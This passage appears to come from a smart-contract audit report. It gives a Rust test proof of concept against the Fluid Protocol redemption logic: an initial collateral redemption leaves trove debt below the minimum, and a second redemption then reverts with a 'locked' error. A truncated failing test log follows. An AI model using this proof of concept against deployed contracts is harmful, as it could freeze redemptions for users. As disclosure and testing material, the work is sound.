    // Firstly wallet1 opens a trove with 6000 collateral and 2000 debt
    // Then wallet1 tries to redeem 1600 collateral
    // During the redemption in contract `trove-manager-contract`'s function `internal_redeem_collateral_from_trove`
    // The new debt is 2000 - 1600 = 400 < MIN_NET_DEBT 
    //------------------------------------------------


    let redemption_amount: u64 = 1600 * PRECISION;

    let protocol_manager_health1 = ContractInstance::new(
        ProtocolManager::new(
            contracts.protocol_manager.contract.contract_id().clone(),
            healthy_wallet1.clone(),
        ),
        contracts.protocol_manager.implementation_id,
    );

    oracle_abi::set_debug_timestamp(&contracts.asset_contracts[1].oracle, PYTH_TIMESTAMP).await;
    pyth_oracle_abi::update_price_feeds(
        &contracts.asset_contracts[1].mock_pyth_oracle,
        pyth_price_feed(1),
    )
    .await;

    protocol_manager_abi::redeem_collateral(
        &protocol_manager_health1,
        redemption_amount,
        10,
        0,  
        None,
        None,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.coll_surplus_pool,
        &contracts.default_pool,
        &contracts.active_pool,
        &contracts.sorted_troves,
        &contracts.asset_contracts,
    )
    .await;

    dbg!("Redeem collateral finished");

    // This will cause a deadlock, and the transaction will be reverted

    protocol_manager_abi::redeem_collateral(
        &protocol_manager_health1,
        20,
        10,
        0,
        None,
        None,
        &contracts.usdf,
        &contracts.fpt_staking,
        &contracts.coll_surplus_pool,
        &contracts.default_pool,
        &contracts.active_pool,
        &contracts.sorted_troves,
        &contracts.asset_contracts,
    )
    .await;

}

output log

test test_dead_lock ... FAILED

successes:

successes:

failures:

---- test_dead_lock stdout ----
Deploying core contracts...
Initializing core contracts...
[contracts/protocol-manager-contract/tests/success_redemptions.rs:116:5] "Redeem collateral finished" = "Redeem collateral finished"
thread 'test_dead_lock' panicked at /home/upon/Documents/work/fluid-protocol/test-utils/src/interfaces/protocol_manager.rs:214:14:
called `Result::unwrap()` on an `Err` value: Transaction(Reverted { reason: "AsciiString { data: \"TroveManager: Internal redeem collateral from trove is locked\" }", revert_id: 18446744073709486080, receipts: [Call { id: 0000000000000000000000000000000000000000000000000000000000000000, 